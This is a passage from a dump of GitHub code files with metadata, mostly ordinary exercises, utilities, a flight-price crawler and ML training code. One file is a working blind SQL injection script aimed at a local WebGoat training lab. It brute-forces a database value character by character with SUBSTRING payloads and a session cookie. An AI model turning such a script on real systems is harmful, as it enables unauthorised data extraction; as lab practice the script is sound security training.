print(1)\n\nwhile len(ORIGIN) != len(COMP):\n if COMP[-1] == 'A':\n COMP.pop()\n else:\n COMP.pop()\n COMP = COMP[::-1]\n\nprint(1 if ORIGIN == COMP else 0)","repo_name":"weekyear/CodingTest","sub_path":"이동규/특강/boj_12904_A와 B.py","file_name":"boj_12904_A와 B.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26196191763","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 22 01:18:30 2019\n\n@author: abhijithneilabraham\n\"\"\"\narr=[5,9,10,7,4]\n\nn=5\nk=2\ndef divisibleSumPairs(n, k, arr):\n count=0\n '''\n for i in range(len(arr)):\n m=arr[i]%k\n \n for j in range(len(arr)):\n if arr[j]==m and j!=i :\n count=count+1\n return count\n '''\n for i in range(n):\n for j in range(i+1,n):\n if(arr[i]+arr[j])%k==0:\n count=count+1\n return count\n \nprint(divisibleSumPairs(n,k,arr))\n \n ","repo_name":"abhijithneilabraham/competitive-coding","sub_path":"algorithm solving/divisible_sum_pairs.py","file_name":"divisible_sum_pairs.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"70801646167","text":"from numpy.random import choice\nfrom random import choice as rchoice\nimport pandas as pd\n\n# set some important global parameters\nNO_NATIONS = 1950\nNAME_MAX = 25\n\n# set some global functions\n\n\ndef name_fix(s):\n if s[0] == \" \":\n return \" \" + s.strip()\n else:\n return s.strip()\n\n\ndef passer(s):\n return s\n\n\ndef loadItemsAndProbabilities(filename):\n temp = []\n with open(filename, 'r') as f:\n temp = temp + [passer(line).strip() for line in f]\n items = []\n items_probs = []\n for e in temp:\n a, b = e.split(\",\")\n items.append(a)\n items_probs.append(float(b))\n return [items, items_probs]\n\n\ndef string_split(s, splitindex):\n return s.split(',')[splitindex].strip()\n\n\ndef load_a_big_bang_file(filename):\n dat = pd.read_csv(filename)\n dat['type'] = [s.strip() for s in dat['type']]\n return dat\n\n\ndef loadItems(filename, isNames=False):\n items = ['']\n with open(filename, 'r') as f:\n items = items + [name_fix(line) for line in f]\n return items\n\n\ndef createName(prefixes, prefix_probability,\n base_names, suffixes, suffix_probability, MAXLENGTH):\n name_not_yet_returned = True\n while name_not_yet_returned:\n nation_prefix = choice(prefixes, 1, p=prefix_probability)\n nation_prefix = nation_prefix[0]\n if nation_prefix != \"\":\n if nation_prefix[-1] != \" \":\n nation_prefix += \" \"\n nation_basename = rchoice(base_names)\n\n nation_suffix = choice(suffixes, 1, p=suffix_probability)\n nation_name = nation_prefix + nation_basename + nation_suffix[0]\n if len(nation_name) <= MAXLENGTH:\n name_not_yet_returned = False\n return nation_name\n\n\ndef main():\n\n # NAMES\n base_names = loadItems('birthing/names.txt')\n pfx = loadItems('birthing/prefix.txt')\n sfx = loadItems('birthing/suffix.txt')\n\n pct_empty = 0.35\n pfx_prob = [pct_empty]\n pfx_prob += [(1-pct_empty) / (len(pfx)-1)] * (len(pfx)-1)\n\n pct_empty = 0.98\n sfx_prob = [pct_empty]\n sfx_prob += [(1-pct_empty) / (len(sfx)-1)] * (len(sfx)-1)\n\n exp, exp_probs = loadItemsAndProbabilities('birthing/exports.txt')\n cur, cur_probs = loadItemsAndProbabilities('birthing/currencies.txt')\n\n namesPool = []\n while len(namesPool) < NO_NATIONS:\n name = createName(pfx, pfx_prob, base_names, sfx, sfx_prob, NAME_MAX)\n if name not in namesPool:\n namesPool.append(name)\n\n print(len(namesPool), 'names in the pool')\n\n for n in namesPool:\n if \"L'Isula\" in n:\n print(n)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"joemulberry/nations_api","sub_path":"birthing_names.py","file_name":"birthing_names.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74086941528","text":"x = input('input array: ') #вводим строку через пробел целые числа\narr = list(map(int, x.split())) #разделяем строку на массив целых чисел\n\ncount=0 #вводим счетчик положительных элементов массива\n\nfor val in arr: #для каждого элемента массива цикл\n if val>0: #мы проверяем является ли элемент положительным\n count+=1 #увеличиваем счетчик\n\nprint(\"кол-во положительных чисел в массиве\",count) # выводим кол-во положительных чисел в ма��сиве\n","repo_name":"kdulep/DreamTeamProject","sub_path":"positivenumarray.py","file_name":"positivenumarray.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12766544392","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nimport mail\n\n\ndriver = webdriver.Chrome()\nurl = 'https://flight.naver.com/flights/domestic/CJU-GMP-20221023?adult=1&child=0&infant=0&fareType=YC&selectedFlight='\n\nfound = False\ncnt = 1\nwhile True:\n driver.get(url)\n WebDriverWait(driver, 30).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.result')))\n for _ in range(5):\n driver.execute_script('window.scrollTo(0, 10000)')\n time.sleep(3)\n\n elements = driver.find_elements(By.CSS_SELECTOR, '.result')\n for idx, element in enumerate(elements):\n l = element.text.split('\\n')\n if l[1].find('이벤트') != -1:\n del l[1]\n flight, departure_raw_str, price_str = \\\n l[0], l[1][:-3], l[4].split()[1][:-2]\n h, m = map(int, departure_raw_str.split(':'))\n price = int(price_str.replace(',', ''))\n\n if (14, 30) <= (h, m) < (16, 0) and price < 150000:\n driver.find_element(\n By.XPATH, f\"//*[@id=\\\"__next\\\"]/div/div[1]/div[6]/div/div[2]/div[{idx+2}]\").click() # 해당 항공편 선택\n time.sleep(2)\n driver.find_element(\n By.XPATH, \"//*[@id=\\\"__next\\\"]/div/div[1]/div[5]/div/div[2]/div[2]/div/div[1]\").click() # 첫번째 여행사 선택\n time.sleep(2)\n driver.switch_to.window(driver.window_handles[-1])\n\n mail_title = \"조건에 맞는 항공권을 발견했습니다\"\n mail_body = f\"\"\"{flight} {str(h).zfill(2)}:{str(m).zfill(2)} 출발\n{price_str}원\n\n가장 저렴한 여행사 예약링크로 이동합니다. \n결제를 진행해주세요!\n\n{driver.current_url}\n\"\"\"\n\n mail.send_to_me(mail_title, mail_body)\n print(\"Success!\")\n found = True\n break\n\n if found:\n break\n print(f\"Try #{cnt} Failed.\", \"30초 후 다시 탐색합니다...\")\n cnt += 1\n time.sleep(30)\n","repo_name":"yoopark/python-web-crawlers","sub_path":"selenium/naver-flight-ticket-crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35116920490","text":"eg.RegisterPlugin(\n name = \"Windows Media Player\",\n author = \"Oystein Hansen\",\n version = \"0.1.1093\",\n kind = \"program\",\n guid = \"{87D26B8D-990C-457C-85C2-8D634868E1D2}\",\n createMacrosOnAdd = True,\n url = \"http://www.eventghost.net/forum/viewtopic.php?t=284\",\n description = (\n 'Adds actions to control the '\n ''\n 'Windows Media Player.'\n ),\n)\n\n# changelog:\n# 0.2 by bitmonster\n# - changed code to use AddActionsFromList and the new WinApi functions.\n# 0.1 by Oystein Hansen\n# - initial version\n\n\n# Here we define a list of actions we want to produce.\n# Every line consists of a tuple with the following items:\n# 1. The Python name of the action. (no spaces or special characters, except\n# underscore, must begin with a letter)\n# 2. The name of the actions as it is shown to the user.\n# 3. A description of the action or None if no descriptions is available.\n# 4. Some data that is later assigned to the self.value member of the action.\n# In this case it is an integer value, that is used as the wParam value\n# for the SendMessage function.\n\nACTIONS = (\n (\"TogglePlay\", \"Toggle Play\", \"Simulate a press on the play / pause button.\", 18808),\n (\"Stop\", \"Stop\", \"Simulate a press on the stop button.\", 18809),\n (\"PreviousTrack\", \"Previous Track\", \"Simulate a press on the previous track button.\", 18810),\n (\"NextTrack\", \"Next Track\", \"Simulate a press on the next track button.\", 18811),\n (\"FastForward\", \"Fast Forward\", \"Fast-forward.\", 18813),\n (\"FastRewind\", \"Rewind\", \"Rewind.\", 18812),\n (\"VolumeUp\", \"Volume Up\", \"Raises WMPlayer's volume by 5%.\", 18815),\n (\"VolumeDown\", \"Volume Down\", \"Lower WMPlayer's volume by 5%.\", 18816),\n (\"ToggleMute\", \"Toggle Mute\", \"Simulate a press on the mute button.\", 18817),\n (\"ToggleShuffle\", \"Toggle Shuffle\", \"Toggles Shuffle.\", 18842),\n (\"ToggleRepeat\", \"Toggle Repeat\", \"Toggles Repeat.\", 18843),\n (\"NowPlaying\", \"Now Playing\", \"Switches to the \\\"Now playing\\\" window.\", 16000),\n (\"Library\", \"Library\", \"Switches to the \\\"Library\\\" window.\", 16004),\n (\"Fullscreen\", \"Fullscreen\", \"Switches between fullscreen and normal mode.\", 18782),\n (\"Exit\", \"Exit\", \"Closes Windows Media Player.\", 57665),\n)\n\n\n# Now we import some other things we will need later\nfrom eg.WinApi import FindWindow, SendMessageTimeout, WM_COMMAND\n\n\n# Next we define a prototype for all actions, because they all work the same\n# way\n\nclass ActionPrototype(eg.ActionClass):\n \"\"\"\n Boilerplate for all actions of this plugin.\n \"\"\"\n # The class attributes 'name', 'description' and 'value' will later be\n # setup by the AddActionsFromList method of the plugin.\n\n def __call__(self):\n \"\"\"\n Find WMPlayer's message window and send it a message with\n SendMessageTimeout.\n \"\"\"\n try:\n hWMP = FindWindow('WMPlayerApp', None)\n return SendMessageTimeout(hWMP, WM_COMMAND, self.value, 0)\n except:\n raise self.Exceptions.ProgramNotRunning\n\n\n# And now we define the actual plugin:\n\nclass WMPlayer(eg.PluginClass):\n\n def __init__(self):\n # Add all actions of our list\n self.AddActionsFromList(ACTIONS, ActionPrototype)\n\n","repo_name":"EventGhost/EventGhost","sub_path":"plugins/WMPlayer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":418,"dataset":"github-code","pt":"31"} +{"seq_id":"15859449897","text":"def train(args, train_dataset, val_dataset, model, tokenizer):\n args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)\n train_sampler = RandomSampler(train_dataset) \n train_dataloader = DataLoader(train_dataset, sampler=train_sampler, \n batch_size=args.train_batch_size, num_workers=args.num_workers)\n\n if args.max_steps > 0:\n t_total = args.max_steps\n args.num_train_epochs = args.max_steps // (len(train_dataloader) // \\\n args.gradient_accumulation_steps) + 1\n else:\n t_total = len(train_dataloader) // args.gradient_accumulation_steps \\\n * args.num_train_epochs\n\n # Prepare optimizer and scheduler\n no_decay = ['bias', 'LayerNorm.weight']\n grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not \\\n any(nd in n for nd in no_decay)], 'weight_decay': args.weight_decay},\n {'params': [p for n, p in model.named_parameters() if \\\n any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n optimizer = AdamW(grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n if args.scheduler == \"constant\":\n scheduler = WarmupConstantSchedule(\n optimizer, warmup_steps=args.warmup_steps)\n elif args.scheduler == \"linear\":\n scheduler = WarmupLinearSchedule(\n optimizer, warmup_steps=args.warmup_steps, t_total=t_total)\n else:\n raise ValueError(\"Unknown scheduler type: {}\".format(args.scheduler))\n\n if args.n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", len(train_dataset))\n logger.info(\" Num Epochs = %d\", args.num_train_epochs)\n logger.info(\" Batch size per GPU = %d\", args.per_gpu_train_batch_size)\n logger.info(\" Total train batch size (w. parallel, & accumulation) = %d\",\n args.train_batch_size * args.gradient_accumulation_steps)\n logger.info(\" Gradient Accumulation steps = %d\", args.gradient_accumulation_steps)\n logger.info(\" Total optimization steps = %d\", t_total)\n\n if args.scst:\n scst_criterion = ScstRewardCriterion()\n logger.info(\" SCST training...\")\n\n global_step, global_loss, global_acc =0, 0.0, 0.0\n model.zero_grad()\n eval_log = []\n best_score = 0\n for epoch in range(int(args.num_train_epochs)):\n for step, (img_keys, batch) in enumerate(train_dataloader):\n batch = tuple(t.to(args.device) for t in batch)\n\n if not args.scst:\n model.train()\n inputs = {'input_ids': batch[0], 'attention_mask': batch[1],\n 'token_type_ids': batch[2], 'img_feats': batch[3], \n 'masked_pos': batch[4], 'masked_ids': batch[5]\n }\n outputs = model(**inputs)\n loss, logits = outputs[:2]\n masked_ids = inputs['masked_ids']\n masked_ids = masked_ids[masked_ids != 0]\n batch_score = compute_score_with_logits(logits, masked_ids)\n batch_acc = torch.sum(batch_score.float()) / torch.sum(inputs['masked_pos'])\n else:\n loss = scst_train_iter(args, train_dataset, model, scst_criterion, img_keys, batch, tokenizer)\n batch_acc = scst_criterion.get_score()\n\n if args.n_gpu > 1: \n loss = loss.mean() # mean() to average on multi-gpu parallel training\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n global_loss += loss.item()\n global_acc += batch_acc\n if (step + 1) % args.gradient_accumulation_steps == 0:\n global_step += 1\n scheduler.step()\n optimizer.step()\n model.zero_grad()\n if global_step % args.logging_steps == 0:\n logger.info(\"Epoch: {}, global_step: {}, lr: {:.6f}, loss: {:.4f} ({:.4f}), \" \\\n \"score: {:.4f} ({:.4f})\".format(epoch, global_step, \n optimizer.param_groups[0][\"lr\"], loss, global_loss / global_step, \n batch_acc, global_acc / global_step)\n )\n\n if (args.save_steps > 0 and global_step % args.save_steps == 0) or \\\n global_step == t_total:\n checkpoint_dir = save_checkpoint(model, tokenizer, args, epoch, global_step) \n # evaluation\n if args.evaluate_during_training: \n logger.info(\"Perform evaluation at step: %d\" % (global_step))\n evaluate_file = evaluate(args, val_dataset, model, tokenizer,\n checkpoint_dir)\n with open(evaluate_file, 'r') as f:\n res = json.load(f)\n best_score = max(best_score, res['CIDEr'])\n res['epoch'] = epoch\n res['global_step'] = step\n res['best_CIDEr'] = best_score\n eval_log.append(res)\n with open(args.output_dir + '/eval_logs.json', 'w') as f:\n json.dump(eval_log, f)\n return global_step, global_loss / global_step","repo_name":"garima-mahato/Skunkworks","sub_path":"docs/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40946015992","text":"from abc import ABCMeta, abstractclassmethod\n\nclass Book(object, metaclass=ABCMeta):\n def __int__(self, title, author):\n self.title = title\n self.author = author\n\n @abstractclassmethod\n def display(cls):\n pass\n\n\nclass MyBook(Book):\n def __init__(self, title, author, price):\n self.title = title\n self.author = author\n self.price = price\n\n def display(self):\n print('Title: {} \\nAuthor: {} \\nPrice: {}'\n .format(self.title, self.author, self.price))\n\n\ntitle = input()\nauthor = input()\nprice = int(input())\nnew_novel = MyBook(title, author, price)\nnew_novel.display()\n","repo_name":"SooDevv/Algorithm_Training","sub_path":"Hackerrank/30 Days of Code/Day13.py","file_name":"Day13.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34393990974","text":"from requests import post # 값 전달과 읽기를 위한 requests 모듈 불러오기\r\n\r\nuri = 'http://127.0.0.1:8080/WebGoat/attack?Screen=1315528047&menu=1100' # 값을 전달할 대상\r\npayload = \"101 and (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'),{},1)='{}');\" # payload 문자열을 1개씩 짤라서 비교한다\r\nparams = {'account_number':'', 'SUBMIT':'Go!'} # post로 전달할 인자값\r\nsession = {'JSESSIONID':'ADD1A83FBD4479857023514A6A496B5A'} # 로그인을 유지하려면 세션이 필요하기 때문에 쿠키 값 저장\r\n\r\nflag = '' # 문자를 1개씩 찾아 나중엔 완성될 flag 변수\r\n\r\nfor x in range(1, 50): # 넉넉하게 50번 반복\r\n\tfor y in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ': # 원래 ord와 chr를 이용해서 구현하려 했으나 잦은 오류로 이렇게 구현\r\n\t\tparams['account_number'] = payload.format(x, y) # params에 있는 account_number에 payload 값을 하나씩 변경 해주면서 대입\r\n\t\t\r\n\t\tr = post(uri, data = params, cookies = session).text # post 형식으로 전송하고 읽어오기\r\n\r\n\t\tif(r.find('Account number is valid') != -1): # if Account number is valid라는 값이 나오면 다음 명령 실행 \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t#(-1이 아닐 떄라고 하는 이유는 저 문자열이 없을 떄 -1을 반환하기 때문에)\r\n\t\t\tflag += y # 찾은 문자 flag에 추가\r\n\t\t\tprint(flag) # 확인차 출력\r\n\t\t\tbreak # 다시 위에 for문 돌기\r\n\r\n\t\tif(y == 'Z') : # 위에 break문에서 for문을 못빠져 나갔으면 flag가 완성된거기 때문에\r\n\t\t\texit(0) # 프로그램 종료","repo_name":"woozek/problem_script","sub_path":"Web_goat/Web_goat(Blind String SQL Injection)_pyscript.py","file_name":"Web_goat(Blind String SQL Injection)_pyscript.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40296918818","text":"import logging\nimport torch\n\nfrom .piecewise_lr import PiecewiseLR\n\ndef optim_sched(epochs, net, *kargs, **kvargs):\n batch_size, train_size = 512, 50000\n steps_per_epoch = round(train_size / batch_size)\n total_steps = steps_per_epoch * epochs\n warmup_steps = steps_per_epoch * 15 # first 15 epochs\n\n lr, momentum, weight_decay = 0.4, 0.9, 5e-4\n optim = torch.optim.SGD(net.parameters(),\n lr, momentum=momentum, weight_decay=weight_decay)\n\n # sched = torch.optim.lr_scheduler.OneCycleLR(\n # optim, max_lr=lr, epochs=epochs, steps_per_epoch=steps_per_epoch,\n # pct_start=warmup_steps/total_steps, anneal_strategy='cos',\n # cycle_momentum=True, div_factor=1.0e5,\n # final_div_factor=1.0e10\n # )\n sched = PiecewiseLR(optim, epochs=[0, 15, 35, 100, 200, 600],\n lrs=[1e-8, lr, 1e-2, 1e-3, 5e-4, 1e-4],\n steps_per_epoch=steps_per_epoch)\n logging.info(f'lr={lr}, momentum={momentum}, weight_decay={weight_decay}, epochs={sched.epochs}, lrs={sched.lrs}')\n\n sched_on_epoch = False\n\n return optim, sched, sched_on_epoch, batch_size","repo_name":"sytelus/cifar_testbed","sub_path":"torch_testbed/optims/superconv.py","file_name":"superconv.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8495082455","text":"import asyncio\nfrom queue import Queue\nimport sys\n\nfrom audio_engine import AudioEngine\nfrom web_socket_server import WebSocketServer\n\nfrom logger import create_logger\nlogger = create_logger(\"main\")\n\nAUDIO_PORT = 3001\nDATA_PORT = 3000\n\n\nasync def main():\n logger.info(\"starting application\")\n\n if len(sys.argv) < 2:\n logger.error(\"No audio file argument provided.\")\n exit(1)\n\n audio_engine = AudioEngine(sys.argv[1])\n\n audio_socket = WebSocketServer(AUDIO_PORT)\n data_socket = WebSocketServer(DATA_PORT)\n\n data_socket.set_out_queue(audio_engine.queue)\n\n audio_engine.set_audio_queue(audio_socket.queue)\n audio_engine.set_data_queue(data_socket.queue)\n\n await asyncio.gather(\n asyncio.to_thread(audio_engine.queue_processor),\n\n asyncio.to_thread(audio_socket.queue_processor),\n asyncio.to_thread(data_socket.queue_processor),\n\n asyncio.to_thread(audio_socket.serve),\n asyncio.to_thread(data_socket.serve),\n\n asyncio.to_thread(audio_engine.run),\n )\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"aelitneg/web-audio-injector","sub_path":"server/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23497640164","text":"print('welcome')\ntry:\n a=int(input('a value:'))\n b=int(input('b value:'))\n c=a/b\nexcept ZeroDivisionError :\n print('b shouldd not be 0.')\nexcept TypeError :\n print('no spaces allowed here')\nexcept ValueError :\n print(' a and b should be integers')\nexcept :\n print('other errors')\nelse:\n print(f'{a}/{b}result is {c}')\n","repo_name":"venkatr21/python_coding","sub_path":"errorhandling.py","file_name":"errorhandling.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23357561112","text":"\"\"\"\ndatos de entrada\nprecio total-->pt-->float\nprecio de cuotas-->pc-->float\ndatos de saldida\nextra-->x-->float\n\"\"\"\n#entrada\npt=float(input(\"precio total \"))\npc=float(input(\"precio cuotas\"))\n#caje negra\nx=pc-(pt/12)\n#salida\nprint(\"el porcentaje extra es \",x,\"%\")","repo_name":"nisanvar/trabajo","sub_path":"taller estructuas de control secuenciales/punto_21.py","file_name":"punto_21.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20302552319","text":"from fastapi import HTTPException\nfrom sqlalchemy import cast, func, Numeric\nfrom sqlalchemy.orm import Session\n\nfrom models.category import Category\nfrom models.transaction import Transaction\nfrom schemas.trend import CategoryFrequency, MostFrequentCategories, CategorySpending, MostExpensiveCategories\n\n\ndef get_most_frequent_categories(db: Session, user_id: int, year: int) -> MostFrequentCategories:\n \"\"\"\n Returns the 5 categories with the biggest number of occurrences.\n \"\"\"\n # Query to find the categories with the biggest number of occurrences\n category_counts = (\n db.query(\n Transaction.mcc,\n func.count().label('count')\n )\n .filter(\n Transaction.user_id == user_id, \n Transaction.year == year\n )\n .group_by(Transaction.mcc) \n .order_by(func.count().desc())\n .limit(5)\n .all()\n )\n\n # If no categories are found, raise an exception\n if not category_counts:\n raise HTTPException(status_code=404, detail=\"No categories found\")\n \n top_categories = []\n for category_count in category_counts:\n # Retrieve MCC description from categories table\n category_description = (\n db.query(\n Category.general_description, \n Category.full_description\n )\n .filter(Category.mcc == category_count.mcc)\n .first()\n )\n top_categories.append(\n CategoryFrequency(\n full_description=category_description.full_description,\n general_description=category_description.general_description,\n num_occurrences=category_count.count\n )\n )\n\n # Create a MostFrequentCategories object and return\n most_frequent_categories = MostFrequentCategories(top_categories=top_categories)\n return most_frequent_categories\n\n\ndef get_most_expensive_categories(db: Session, user_id: int, year: int) -> MostExpensiveCategories:\n \"\"\"\n Returns the 5 categories in which the user spent the most.\n \"\"\"\n # Query to find the categories with the biggest sum of amounts\n category_totals = (\n db.query(\n Transaction.mcc,\n cast(func.sum(Transaction.amount), Numeric(10, 0)).label('total')\n )\n .filter(\n Transaction.user_id == user_id, \n Transaction.year == year\n )\n .group_by(Transaction.mcc) \n .order_by(func.sum(Transaction.amount).desc())\n .limit(5)\n .all()\n )\n\n # If no categories are found, raise an exception\n if not category_totals:\n raise HTTPException(status_code=404, detail=\"No categories found\")\n \n top_categories = []\n for category_total in category_totals:\n # Retrieve MCC description from categories table\n category_description = (\n db.query(\n Category.general_description, \n Category.full_description\n )\n .filter(Category.mcc == category_total.mcc)\n .first()\n )\n top_categories.append(\n CategorySpending(\n full_description=category_description.full_description,\n general_description=category_description.general_description,\n total_amount=category_total.total\n )\n )\n\n # Create a MostExpensiveCategories object and return\n most_expensive_categories = MostExpensiveCategories(top_categories=top_categories)\n return most_expensive_categories","repo_name":"emmanuelsdias/hyper-wrapped","sub_path":"backend/controllers/category_controller.py","file_name":"category_controller.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40931680812","text":"def number(temp):\n if temp == 'zero':\n return '0'\n elif temp == 'one':\n return '1'\n elif temp == 'two':\n return '2'\n elif temp == 'three':\n return '3'\n elif temp == 'four':\n return '4'\n elif temp == 'five':\n return '5'\n elif temp == 'six':\n return '6'\n elif temp == 'seven':\n return '7'\n elif temp == 'eight':\n return '8'\n elif temp == 'nine':\n return '9'\n else:\n return '-1'\n\n\ndef solution(s):\n answer = ''\n\n temp = ''\n for i in range(len(s)):\n if s[i].isdigit():\n temp = ''\n answer += s[i]\n else:\n temp += s[i]\n if i == len(s) - 1:\n answer += number(temp)\n elif s[i + 1].isdigit():\n answer += number(temp)\n elif len(temp) >= 3:\n x = number(temp)\n if x == '-1':\n pass\n else:\n answer += x\n temp = ''\n\n return int(answer)","repo_name":"Parksohui/Algorithm","sub_path":"programmers/숫자문자열과영단어.py","file_name":"숫자문자열과영단어.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"406960016","text":"import torch\nfrom torch.utils.data import DataLoader\nimport pickle\nfrom p1_model import ResNet_feature_extractor\nfrom p1_dataset import VideoDataset\n#from sklearn.manifold import TSNE\n#from matplotlib import pyplot as plt\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device('cuda' if use_cuda else 'cpu')\nprint('Device used', device)\n\ntrainset = VideoDataset(t_v='train')\ntrainloader = DataLoader(trainset, batch_size=1, shuffle=False, num_workers=1)\nvalidset = VideoDataset(t_v='valid')\nvalidloader = DataLoader(validset, batch_size=1, shuffle=False, num_workers=1)\n\nfeature_extractor = ResNet_feature_extractor().to(device)\nfeature_extractor.eval()\n\ntrain_feature = []\ntrain_label = []\nwith torch.no_grad():\n for i, (data, label) in enumerate(trainloader):\n data = data.to(device).squeeze(0)\n feature = feature_extractor(data)\n feature = torch.mean(feature, 0).cpu()\n train_feature.append(feature)\n train_label.append(label.item())\nwith open('./features/train_feature.pickle', 'wb') as f:\n pickle.dump(train_feature, f)\nwith open('./features/train_label.pickle', 'wb') as f:\n pickle.dump(train_label, f) \nprint('train feature finished')\n\nvalid_feature = []\nvalid_label = []\nwith torch.no_grad():\n for i, (data, label) in enumerate(validloader):\n data = data.to(device).squeeze(0)\n feature = feature_extractor(data)\n feature = torch.mean(feature, 0).cpu()\n valid_feature.append(feature)\n valid_label.append(label.item())\nwith open('./features/valid_feature.pickle', 'wb') as f:\n pickle.dump(valid_feature, f)\nwith open('./features/valid_label.pickle', 'wb') as f:\n pickle.dump(valid_label, f)\nprint('validation feature finished')\n'''\ntsne = TSNE(n_components=2, random_state=0)\nX_2d = tsne.fit_transform(valid_feature)\ntarget_names = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ntarget_ids = range(len(target_names))\n\nplt.figure(figsize=(6, 5))\ncolors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'grey', 'orange', 'purple']\nfor i, c, label in zip(target_ids, colors, target_names):\n plt.scatter(X_2d[valid_label == i, 0], X_2d[valid_label == i, 1], c=c, label=label)\nplt.legend()\nplt.show()\nplt.savefig('CNN_tsne.png')\n'''\n","repo_name":"kkeen699/DLCV-spring2019","sub_path":"hw4/p1/p1_video2cnn.py","file_name":"p1_video2cnn.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23987919571","text":"import tensorflow as tf\r\n\r\nclass RatingPrediction():\r\n def __init__(self, para_dict):\r\n self.para_dict = para_dict\r\n\r\n def rating_prediction(self, embeded_uid, embeded_iid, input_y):\r\n Wu = tf.get_variable('Wru', [self.para_dict['embedding_id_size'], self.para_dict['n_latent']])\r\n self.u_feas = tf.matmul(embeded_uid, Wu)\r\n\r\n Wi = tf.get_variable('Wri', [self.para_dict['embedding_id_size'], self.para_dict['n_latent']])\r\n self.i_feas = tf.matmul(embeded_iid, Wi)\r\n\r\n Br = tf.get_variable('Wrb', [self.para_dict['n_latent']])\r\n feas = tf.sigmoid(self.u_feas + self.i_feas + Br)\r\n\r\n for i in range(0, 1):\r\n Wr = tf.get_variable('Wr' + str(i), [self.para_dict['n_latent'], self.para_dict['n_latent']])\r\n Br = tf.get_variable('Wb' + str(i), [self.para_dict['n_latent']]) # name:新变量或现有变量的名称,这个参数是必须的,函数会根据变量名称去创建或者获取变量\r\n feas = tf.sigmoid(tf.matmul(feas, Wr) + Br)\r\n\r\n Wrr = tf.get_variable('Wrr', [self.para_dict['n_latent'], 1])\r\n Brr = tf.get_variable('Wbr', [1])\r\n r = tf.matmul(feas, Wrr) + Brr\r\n mse = tf.reduce_mean(tf.square(input_y - r))\r\n rmse = tf.sqrt(tf.reduce_mean(tf.square(input_y - r)))\r\n mae = tf.reduce_mean(tf.abs(input_y - r))\r\n return r, feas, mse, rmse, mae\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Anxbbq/EMER","sub_path":"Model/rating_predicting.py","file_name":"rating_predicting.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"22204694443","text":"\"\"\"App drf url tests.\n\"\"\"\n\nimport pytest\nfrom django.urls import resolve, reverse\n\npytestmark = pytest.mark.django_db\n\n\ndef test_camera_task_detail(camera_task):\n \"\"\"test_camera_task_detail.\"\"\"\n assert (\n reverse(\"api:cameratask-detail\", kwargs={\"pk\": camera_task.id})\n == f\"/api/camera_tasks/{camera_task.id}\"\n )\n assert (\n resolve(f\"/api/camera_tasks/{camera_task.id}\").view_name\n == \"api:cameratask-detail\"\n )\n\n\ndef test_camera_task_list():\n \"\"\"test_camera_task_list.\"\"\"\n assert reverse(\"api:cameratask-list\") == \"/api/camera_tasks\"\n assert 